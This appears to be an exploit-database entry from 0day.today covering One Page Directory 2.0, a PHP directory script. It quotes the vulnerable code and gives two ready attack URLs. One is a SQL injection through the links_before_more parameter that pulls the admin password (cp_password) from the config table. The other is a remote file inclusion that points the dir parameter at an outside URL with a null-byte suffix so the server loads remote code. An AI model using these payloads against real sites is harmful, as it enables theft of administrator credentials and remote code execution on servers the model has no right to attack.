One Page Directory Multiple SQL/RFI Vulnerabilities

2012-10-26T00:00:00
ID 1337DAY-ID-19636
Type zdt
Reporter Cold Zero
Modified 2012-10-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            /**
 * @exploit             One Page Directory Multiple [SQL/RFI] Vulnerabilities
 * @script EN-Title     One Page Directory 
 * @script AR-Title     برنامج وصلة
 * @virsion             2.0
 * @author              Cold Zero <- [Cold z3ro] => www.hackteach.org
 * @copyright           25/10/2012
 * @script              http://www.leenkat.com/vb/attachment.php?s=3cc1846a814d926ccc9ed9aab646abb5&attachmentid=6761&d=1261250933
 * @vendor              http://www.orioncities.com/
 */


1. [SQl] 

file => index.php => from lines 70-84

        if ( isset( $_GET['cid'] ) )
        {
            $cid = $_GET['cid'];
            settype( &$cid, "integer" );
            $checkID = _obfuscate_KCVjO3d2Xxk4YnRnIXEے( _obfuscate_CXIZARoUBQt7HD8ے( "SELECT cid FROM opd_category WHERE active = 'yes' AND cid = '".$cid."'" ) );
            if ( 0 < $checkID )
            {
                $where = " AND cid = ".$cid;
                $pidSQL = "";
            }
        }
        else if ( $links_before_more != 0 )
        {
            $limit = " LIMIT ".$links_before_more;
        }
[EOF]

Exploit;
/index.php?links_before_more=1'+union+select+cp_password,0+from+opd_config--


/*-------------------------------------*/
2. [RFI]

file => index.php => from lines 325-375

$cr['en']['url'] = "http://www.orioncities.com/arabic/";
if ( strstr( $page, $cr['en']['url'] ) )
{
    require( $dir."inc/lang/".$cp_language );
    echo $strRestoreCopyright;
}
[EOF]

Exploit;
/index.php?cr['en']['url']=http://www.orioncities.com/arabic/&dir=http://c0de.txt?%00

#  0day.today [2018-02-16]  #